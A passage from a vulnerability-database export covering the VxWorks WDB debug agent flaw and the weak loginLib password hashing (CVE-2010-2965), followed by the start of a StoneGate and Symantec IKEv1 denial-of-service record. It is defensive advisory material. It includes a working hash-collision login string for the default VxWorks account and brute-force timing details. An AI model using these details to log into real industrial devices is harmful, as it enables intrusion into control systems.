        "data": "The WDB target agent debug service in Wind River VxWorks 6.x, 5.x, and earlier, as used on the Rockwell Automation 1756-ENBT series A with firmware 3.2.6 and 3.6.1 and other products, allows remote attackers to read or modify arbitrary memory locations, perform function calls, or manage tasks via requests to UDP port 17185, a related issue to CVE-2005-3804. Some products based on VxWorks have the WDB target agent debug service enabled by default.  This service provides read/write access to the device\u0027s memory and allows functions to be called. The VxWorks WDB target agent is a target-resident, run-time facility that is required for connecting host tools to a VxWorks target system during development. WDB is a selectable component in the VxWorks configuration and is enabled by default. The WDB debug agent access is not secured and does provide a security hole in a deployed system. It is advisable for production systems to reconfigure VxWorks with only those components needed for deployed operation and to build it as the appropriate type of system image.  It is recommended to remove host development components such as the WDB target agent and debugging components (INCLUDE_WDB and INCLUDE_DEBUG) as well as other operating system components that are not required to support customer applications. Consult the VxWorks Kernel Programmer\u0027s guide for more information on WDB.Additional information can be found in ICS-CERT advisory ICSA-10-214-01 and on the Metasploit Blog. An attacker can use the debug service to fully compromise the device. The hashing algorithm that is used in the standard authentication API for VxWorks is susceptible to collisions.  An attacker can brute force a password by guessing a string that produces the same hash as a legitimate password. It is relatively easy to find a string that has the same hash value as a regular password.Authentication by attacker API (loginLib) May be used to access services using. The problem is CVE-2005-3804 May be related toBy a third party UDP An arbitrary memory area may be read or modified, a function call executed, or a task managed through a request to the port. VxWorks is an embedded real-time operating system. VxWorks has multiple security vulnerabilities that allow an attacker to bypass security restrictions and gain unauthorized access to the system. For example, when logging in with the default \u0027target/password\u0027, \u0027y{{{{{SS\u0027 will HASH out the same result as \u0027password\u0027. So you can use \u0027password\u0027 and \u0027y{{{{{SS\u0027 as the password to log in. Permissions and access control vulnerabilities exist in the WDB Target Agent Debugging Service in Wind River VxWorks 6.x, 5.x and earlier. VxWorks is prone to a remote security-bypass vulnerability. \nSuccessful exploits will allow remote attackers to perform debugging tasks on the vulnerable device. \nThe issue affects multiple products from multiple vendors that ship with the VxWorks operating system. \nNOTE: This issue was previously covered in BID 42114 (VxWorks Multiple Security Vulnerabilities) but has been separated into its own record to better document it. R7-0035: VxWorks Authentication Library Weak Password Hashing\nAugust 2, 2010\n\n-- Vulnerability Details:\nThis vulnerability allows remote attackers to bypass the authentication\nprocess for the Telnet and FTP services of the VxWorks operating system. \nThis flaw occurs due to an insecure password hashing implementation in\nthe authentication library (loginLib) of the VxWorks operating system. \nRegardless of what password is set for a particular account, there are a\nonly small number (~210k) of possible hash outputs. Typical passwords\nconsisting of alphanumeric characters and symbols fall within an even\nsmaller range of hash outputs (~8k), making this trivial to brute force\nover the network. To excaberate matters, loginLib has no support for\naccount lockouts and the FTP daemon does not disconnect clients that\nconsistently fail to authenticate. This reduces the brute force time for\nthe FTP service to approximately 30 minutes. \n\nTo demonstrate the hash weakness, the password of \"insecure\" hashes to\nthe value \"Ry99dzRcy9\". The hashing algorithm itself is based on an additive sum\nwith a small XOR operation. The resulting sums are then transformed to a\nprintable string, but the range of possible intermediate values is\nlimited and mostly sequential. The entire collision table has been\nprecomputed and will be released in early September as an input file for\ncommon brute force tools. More information about the hashing algorithm\nitself is available at the Metasploit blog post below:\n\n http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html\n\nThere are three requirements for this vulnerability to be exploited:\n\n * The device must be running at least one service that uses loginLib\nfor authentication. Telnet and FTP do so by default. \n\n * A valid username must be known to the attacker. This is usually easy\nto determine through product manuals or a cursory review of the firmware\nbinaries. \n\nA typical VxWorks device will meet all three requirements by default,\nbut customization by the device manufacturer may preclude this from\nbeing exploited. In general, if the device displays a VxWorks banner for\nTelnet or FTP, it is more than likely vulnerable. \n\n-- Vendor Response:\nWind River Systems has notified their customers of the issue and\nsuggested that each downstream vendor replace the existing hash\nimplementation with SHA512 or SHA256. The exact extent of the\nvulnerability and the complete list of affected devices is not known at\nthis time. Example code from Wind River Systems has been supplied to\nCERT and is included in the advisory below:\n\n http://www.kb.cert.org/vuls/id/840249\n\n-- Disclosure Timeline:\n2009-06-02 - Vulnerability reported to CERT for vendor notification\n2009-08-02 - Coordinated public release of advisory\n\n-- Credit:\nThis vulnerability was discovered by HD Moore\n\n-- About Rapid7 Security\nRapid7 provides vulnerability management, compliance and penetration\ntesting solutions for Web application, network and database security. In\naddition to developing the NeXpose Vulnerability Management system,\nRapid7 manages the Metasploit Project and is the primary sponsor of the\nW3AF web assessment tool. \n\nOur vulnerability disclosure policy is available online at:\n\n http://www.rapid7.com/disclosure.jsp\n\n\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2010-2965"
          },
          {
            "db": "CERT/CC",
            "id": "VU#362332"
          },
          {
            "db": "CERT/CC",
            "id": "VU#840249"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-001882"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-005612"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2010-1489"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2010-3891"
          },
          {
            "db": "BID",
            "id": "42158"
          },
          {
            "db": "IVD",
            "id": "bab59964-1fb2-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "7d72f2c0-463f-11e9-98f5-000c29342cb1"
          },
          {
            "db": "IVD",
            "id": "7d738f00-463f-11e9-ac13-000c29342cb1"
          },
          {
            "db": "IVD",
            "id": "017253fa-2356-11e6-abef-000c29c66e3d"
          },
          {
            "db": "VULHUB",
            "id": "VHN-45570"
          },
          {
            "db": "PACKETSTORM",
            "id": "92449"
          }
        ],
        "trust": 6.03
      },
      "exploit_availability": {
        "_id": null,
        "data": [
          {
            "reference": "https://www.kb.cert.org/vuls/id/362332",
            "trust": 0.8,
            "type": "unknown"
          },
          {
            "reference": "https://www.kb.cert.org/vuls/id/840249",
            "trust": 0.8,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#362332"
          },
          {
            "db": "CERT/CC",
            "id": "VU#840249"
          }
        ]
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#362332",
            "trust": 4.8
          },
          {
            "db": "NVD",
            "id": "CVE-2010-2965",
            "trust": 3.8
          },
          {
            "db": "CERT/CC",
            "id": "VU#840249",
            "trust": 1.7
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-10-214-01",
            "trust": 1.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201008-029",
            "trust": 1.1
          },
          {
            "db": "CNVD",
            "id": "CNVD-2010-1489",
            "trust": 1.0
          },
          {
            "db": "CNVD",
            "id": "CNVD-2010-3891",
            "trust": 1.0
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-001882",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-005612",
            "trust": 0.8
          },
          {
            "db": "BID",
            "id": "42114",
            "trust": 0.6
          },
          {
            "db": "BID",
            "id": "42158",
            "trust": 0.4
          },
          {
            "db": "IVD",
            "id": "BAB59964-1FB2-11E6-ABEF-000C29C66E3D",
            "trust": 0.2
          },
          {
            "db": "IVD",
            "id": "7D72F2C0-463F-11E9-98F5-000C29342CB1",
            "trust": 0.2
          },
          {
            "db": "IVD",
            "id": "7D738F00-463F-11E9-AC13-000C29342CB1",
            "trust": 0.2
          },
          {
            "db": "IVD",
            "id": "017253FA-2356-11E6-ABEF-000C29C66E3D",
            "trust": 0.2
          },
          {
            "db": "VULHUB",
            "id": "VHN-45570",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "92449",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "bab59964-1fb2-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "7d72f2c0-463f-11e9-98f5-000c29342cb1"
          },
          {
            "db": "IVD",
            "id": "7d738f00-463f-11e9-ac13-000c29342cb1"
          },
          {
            "db": "IVD",
            "id": "017253fa-2356-11e6-abef-000c29c66e3d"
          },
          {
            "db": "CERT/CC",
            "id": "VU#362332"
          },
          {
            "db": "CERT/CC",
            "id": "VU#840249"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2010-1489"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2010-3891"
          },
          {
            "db": "VULHUB",
            "id": "VHN-45570"
          },
          {
            "db": "BID",
            "id": "42158"
          },
          {
            "db": "PACKETSTORM",
            "id": "92449"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201008-029"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-001882"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-005612"
          },
          {
            "db": "NVD",
            "id": "CVE-2010-2965"
          }
        ]
      },
      "id": "VAR-201008-0270",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "IVD",
            "id": "bab59964-1fb2-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "7d72f2c0-463f-11e9-98f5-000c29342cb1"
          },
          {
            "db": "IVD",
            "id": "7d738f00-463f-11e9-ac13-000c29342cb1"
          },
          {
            "db": "IVD",
            "id": "017253fa-2356-11e6-abef-000c29c66e3d"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2010-1489"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2010-3891"
          },
          {
            "db": "VULHUB",
            "id": "VHN-45570"
          }
        ],
        "trust": 2.52030044
      },
      "iot_taxonomy": {
        "_id": null,
        "data": [
          {
            "category": [
              "ICS"
            ],
            "sub_category": null,
            "trust": 2.0
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "bab59964-1fb2-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "7d72f2c0-463f-11e9-98f5-000c29342cb1"
          },
          {
            "db": "IVD",
            "id": "7d738f00-463f-11e9-ac13-000c29342cb1"
          },
          {
            "db": "IVD",
            "id": "017253fa-2356-11e6-abef-000c29c66e3d"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2010-1489"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2010-3891"
          }
        ]
      },
      "last_update_date": "2026-04-10T22:47:09.862000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "http://windriver.com/"
          },
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "http://www.rockwellautomation.com/"
          },
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "http://windriver.com/index.html"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-001882"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-005612"
          }
        ]
      },
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "CWE-863",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-264",
            "trust": 0.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-45570"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-005612"
          },
          {
            "db": "NVD",
            "id": "CVE-2010-2965"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 3.4,
            "url": "http://www.kb.cert.org/vuls/id/362332"
          },
          {
            "trust": 2.5,
            "url": "https://support.windriver.com/olsportal/faces/maintenance/downloaddetails.jspx?contentid=033708"
          },
          {
            "trust": 2.1,
            "url": "http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html"
          },
          {
            "trust": 1.7,
            "url": "http://rockwellautomation.custhelp.com/cgi-bin/rockwellautomation.cfg/php/enduser/std_adp.php?p_faqid=69735"
          },
          {
            "trust": 1.7,
            "url": "http://www.kb.cert.org/vuls/id/mapg-86epfa"
          },
          {
            "trust": 1.7,
            "url": "http://www.kb.cert.org/vuls/id/mapg-86fpql"
          },
          {
            "trust": 1.6,
            "url": "https://community.rapid7.com/community/metasploit/blog/2010/08/02/shiny-old-vxworks-vulnerabilities"
          },
          {
            "trust": 1.6,
            "url": "http://www.us-cert.gov/control_systems/pdf/icsa-10-214-01_vxworks_vulnerabilities.pdf"
          },
          {
            "trust": 1.6,
            "url": "http://blogs.windriver.com/chauhan/2010/08/vxworks-secure.html"
          },
          {
            "trust": 1.0,
            "url": "http://seclists.org/fulldisclosure/2025/jan/10"
          },
          {
            "trust": 0.9,
            "url": "http://www.kb.cert.org/vuls/id/840249"
          },
          {
            "trust": 0.8,
            "url": "http://www.cisco.com/warp/public/707/cisco-sa-20051116-7920.shtml"
          },
          {
            "trust": 0.8,
            "url": "http://seclists.org/vuln-dev/2002/may/179"
          },
          {
            "trust": 0.8,
            "url": "http://thesauceofutterpwnage.blogspot.com/2010/08/metasploit-vxworks-wdb-agent-attack.html"
          },
          {
            "trust": 0.8,
            "url": "http://cwe.mitre.org/data/definitions/215.html"
          },
          {
            "trust": 0.8,
            "url": "http://cwe.mitre.org/data/definitions/505.html"
          },
          {
            "trust": 0.8,
            "url": "https://support.windriver.com/olsportal/faces/maintenance/downloaddetails.jspx?contentid=033709"
          },
          {
            "trust": 0.8,
            "url": "http://newsoft-tech.blogspot.com/2010/09/follow-up-on-vxworks-issue.html"
          },
          {
            "trust": 0.8,
            "url": "http://cvk.posterous.com/how-to-crack-vxworks-password-hashes"
          },
          {
            "trust": 0.8,
            "url": "http://cwe.mitre.org/data/definitions/798.html"
          },
          {
            "trust": 0.8,
            "url": "http://cwe.mitre.org/data/definitions/327.html"
          },
          {
            "trust": 0.8,
            "url": "http://cwe.mitre.org/data/definitions/916.html"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnvu840249"
          },
          {
            "trust": 0.8,
            "url": "http://www.kb.cert.org/vuls/id/mapg-863qh9"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2965"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2010-2965"
          },
          {
            "trust": 0.6,
            "url": "http://www.kb.cert.org/vuls/id/362332http"
          },
          {
            "trust": 0.3,
            "url": "http://download.schneider-electric.com/files?p_doc_ref=sevd%202013-345-01"
          },
          {
            "trust": 0.3,
            "url": "http://www.windriver.com/"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/512825"
          },
          {
            "trust": 0.1,
            "url": "http://www.rapid7.com/disclosure.jsp"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#362332"
          },
          {
            "db": "CERT/CC",
            "id": "VU#840249"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2010-1489"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2010-3891"
          },
          {
            "db": "VULHUB",
            "id": "VHN-45570"
          },
          {
            "db": "BID",
            "id": "42158"
          },
          {
            "db": "PACKETSTORM",
            "id": "92449"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201008-029"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-001882"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-005612"
          },
          {
            "db": "NVD",
            "id": "CVE-2010-2965"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "IVD",
            "id": "bab59964-1fb2-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "db": "IVD",
            "id": "7d72f2c0-463f-11e9-98f5-000c29342cb1",
            "ident": null
          },
          {
            "db": "IVD",
            "id": "7d738f00-463f-11e9-ac13-000c29342cb1",
            "ident": null
          },
          {
            "db": "IVD",
            "id": "017253fa-2356-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "db": "CERT/CC",
            "id": "VU#362332",
            "ident": null
          },
          {
            "db": "CERT/CC",
            "id": "VU#840249",
            "ident": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2010-1489",
            "ident": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2010-3891",
            "ident": null
          },
          {
            "db": "VULHUB",
            "id": "VHN-45570",
            "ident": null
          },
          {
            "db": "BID",
            "id": "42158",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "92449",
            "ident": null
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201008-029",
            "ident": null
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-001882",
            "ident": null
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-005612",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2010-2965",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2010-08-03T00:00:00",
            "db": "IVD",
            "id": "bab59964-1fb2-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "date": "2010-08-03T00:00:00",
            "db": "IVD",
            "id": "7d72f2c0-463f-11e9-98f5-000c29342cb1",
            "ident": null
          },
          {
            "date": "2010-08-05T00:00:00",
            "db": "IVD",
            "id": "7d738f00-463f-11e9-ac13-000c29342cb1",
            "ident": null
          },
          {
            "date": "2010-08-05T00:00:00",
            "db": "IVD",
            "id": "017253fa-2356-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "date": "2010-08-02T00:00:00",
            "db": "CERT/CC",
            "id": "VU#362332",
            "ident": null
          },
          {
            "date": "2010-08-02T00:00:00",
            "db": "CERT/CC",
            "id": "VU#840249",
            "ident": null
          },
          {
            "date": "2010-08-03T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2010-1489",
            "ident": null
          },
          {
            "date": "2010-08-05T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2010-3891",
            "ident": null
          },
          {
            "date": "2010-08-05T00:00:00",
            "db": "VULHUB",
            "id": "VHN-45570",
            "ident": null
          },
          {
            "date": "2010-08-02T00:00:00",
            "db": "BID",
            "id": "42158",
            "ident": null
          },
          {
            "date": "2010-08-03T18:01:12",
            "db": "PACKETSTORM",
            "id": "92449",
            "ident": null
          },
          {
            "date": "2010-08-05T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201008-029",
            "ident": null
          },
          {
            "date": "2010-08-26T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2010-001882",
            "ident": null
          },
          {
            "date": "2012-12-20T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2010-005612",
            "ident": null
          },
          {
            "date": "2010-08-05T13:22:29.793000",
            "db": "NVD",
            "id": "CVE-2010-2965",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2020-09-02T00:00:00",
            "db": "CERT/CC",
            "id": "VU#362332",
            "ident": null
          },
          {
            "date": "2014-06-02T00:00:00",
            "db": "CERT/CC",
            "id": "VU#840249",
            "ident": null
          },
          {
            "date": "2010-08-03T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2010-1489",
            "ident": null
          },
          {
            "date": "2010-08-05T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2010-3891",
            "ident": null
          },
          {
            "date": "2010-08-05T00:00:00",
            "db": "VULHUB",
            "id": "VHN-45570",
            "ident": null
          },
          {
            "date": "2015-03-19T08:47:00",
            "db": "BID",
            "id": "42158",
            "ident": null
          },
          {
            "date": "2022-08-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201008-029",
            "ident": null
          },
          {
            "date": "2010-08-26T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2010-001882",
            "ident": null
          },
          {
            "date": "2012-12-20T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2010-005612",
            "ident": null
          },
          {
            "date": "2025-04-11T00:51:21.963000",
            "db": "NVD",
            "id": "CVE-2010-2965",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201008-029"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "_id": null,
        "data": "Wind River Systems VxWorks debug service enabled by default",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#362332"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "_id": null,
        "data": "permissions and access control issues",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201008-029"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-200511-0018

    Vulnerability from variot - Updated: 2026-04-10 22:30

    The Internet Key Exchange version 1 (IKEv1) implementation in Stonesoft StoneGate Firewall before 2.6.1 allows remote attackers to cause a denial of service via certain crafted IKE packets, as demonstrated by the PROTOS ISAKMP Test Suite for IKEv1. NOTE: due to the lack of details in the Stonesoft advisory, it is unclear which of CVE-2005-3666, CVE-2005-3667, and/or CVE-2005-3668 this issue applies to. Numerous vulnerabilities have been reported in various Internet Key Exchange version 1 (IKEv1) implementations. The impacts of these vulnerabilities may allow an attacker to execute arbitrary code, cause a denial-of-service condition, or cause an IKEv1 implementation to behave in an unstable/unpredictable manner. Stonesoft StoneGate Firewall and VPN Client are prone to multiple unspecified vulnerabilities in its IKEv1 implementation. Potential issues include denial of service attacks, format strings, and buffer overflows. These issues were discovered with the PROTOS ISAKMP Test Suite and are related to handling of malformed IKEv1 traffic. Stonesoft StoneGate Firewall is a firewall.

    TITLE: Symantec Firewall/VPN/Gateway ISAKMP Message Processing Denial of Service

    SECUNIA ADVISORY ID: SA17684

    VERIFY ADVISORY: http://secunia.com/advisories/17684/

    CRITICAL: Moderately critical

    IMPACT: DoS

    WHERE:

    From remote

    OPERATING SYSTEM: Symantec Gateway Security 400 Series http://secunia.com/product/6175/ Symantec Gateway Security 300 Series http://secunia.com/product/6176/ Symantec Gateway Security 3.x http://secunia.com/product/6177/ Symantec Gateway Security 2.x http://secunia.com/product/3104/ Symantec Gateway Security 1.x http://secunia.com/product/876/ Symantec Firewall/VPN Appliance 100/200/200R http://secunia.com/product/552/

    SOFTWARE: Symantec Enterprise Firewall (SEF) 8.x http://secunia.com/product/3587/

    DESCRIPTION: Symantec has acknowledged a vulnerability in various Symantec products, which can be exploited by malicious people to cause a DoS (Denial of Service).

    For more information: SA17553

    Successful exploitation causes a DoS of the dynamic VPN services.

    The vulnerability has been reported in the following products. * Symantec Enterprise Firewall version 8.0 (Windows) * Symantec Enterprise Firewall version 8.0 (Solaris) * Symantec Gateway Security 5000 Series version 3.0 * Symantec Gateway Security 5400 version 2.0.1 * Symantec Gateway Security 5310 version 1.0 * Symantec Gateway Security 5200/5300 version 1.0 * Symantec Gateway Security 5100 * Symantec Gateway Security 400 version 2.0 * Symantec Gateway Security 300 version 2.0 * Symantec Firewall /VPN Appliance 200/200R * Symantec Firewall /VPN Appliance 100

    SOLUTION: Apply hotfixes.

    Symantec Enterprise Firewall version 8.0 (Windows): Apply SEF8.0-20051114-00. http://www.symantec.com/techsupp/enterprise/products/sym_ent_firewall/sym_ent_fw_8/files.html

    Symantec Enterprise Firewall version 8.0 (Solaris): Apply SEF8.0-20051114-00. http://www.symantec.com/techsupp/enterprise/products/sym_ent_firewall/sym_ent_fw_8_sol/files.html

    Symantec Gateway Security 5000 Series version 3.0: Apply SGS3.0-2005114-02. http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sgs_5600_3/files.html

    Symantec Gateway Security 5400 version 2.0.1: Apply SGS2.0.1-20051114-00. http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_201_5400/files.html

    Symantec Gateway Security 5310 version 1.0: Apply SG7004-20051114-00. http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_1_5310/files.html

    Symantec Gateway Security 5200/5300 version 1.0: Apply SG7004-20051114-00. http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_1_52005300/files.html

    Symantec Gateway Security 5100: Apply SG7004-20051114-00. http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_1_5110/files.html

    Symantec Gateway Security 400 version 2.0: Update to build 1103. http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sgs_2_400/files.html

    Symantec Gateway Security 300 version 2.0: Update to build 1103. http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sgs_300s_2/files.html

    Symantec Firewall /VPN Appliance 200/200R: Update to build 1.8F. http://www.symantec.com/techsupp/enterprise/products/sym_fw_vpn_appliance/sym_fw_vpn_appliance_200r/files.html

    Symantec Firewall /VPN Appliance 100: Update to build 1.8F. http://www.symantec.com/techsupp/enterprise/products/sym_fw_vpn_appliance/sym_fw_vpn_appliance_100/files.html

    ORIGINAL ADVISORY: Symantec: http://securityresponse.symantec.com/avcenter/security/Content/2005.11.21.html

    OTHER REFERENCES: SA17553: http://secunia.com/advisories/17553/


    About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.

    Subscribe: http://secunia.com/secunia_security_advisories/

    Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/

    Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


    Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": "stonegate firewall",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "stonesoft",
            "version": "2.6.0"
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "check point",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "fortinet",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "nec",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "openswan linux ipsec",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "qnx",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "stonesoft",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": null
          },
          {
            "_id": null,
            "model": "stonegate firewall",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "stonesoft",
            "version": "2.6.0"
          },
          {
            "_id": null,
            "model": "stonegate vpn client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6"
          },
          {
            "_id": null,
            "model": "stonegate vpn client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0.9"
          },
          {
            "_id": null,
            "model": "stonegate vpn client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0.8"
          },
          {
            "_id": null,
            "model": "stonegate vpn client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0.7"
          },
          {
            "_id": null,
            "model": "stonegate vpn client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "stonegate vpn client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "1.7.2"
          },
          {
            "_id": null,
            "model": "stonegate vpn client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "1.7"
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6"
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0.8"
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "1.7"
          },
          {
            "_id": null,
            "model": "stonegate vpn client",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6.1"
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6.3"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#226364"
          },
          {
            "db": "BID",
            "id": "15405"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-252"
          },
          {
            "db": "NVD",
            "id": "CVE-2005-3672"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "Discovery is credited to NISCC, CERT-FI, and the Oulu University Secure Programming Group.",
        "sources": [
          {
            "db": "BID",
            "id": "15405"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-252"
          }
        ],
        "trust": 0.9
      },
      "cve": "CVE-2005-3672",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 5.0,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2005-3672",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
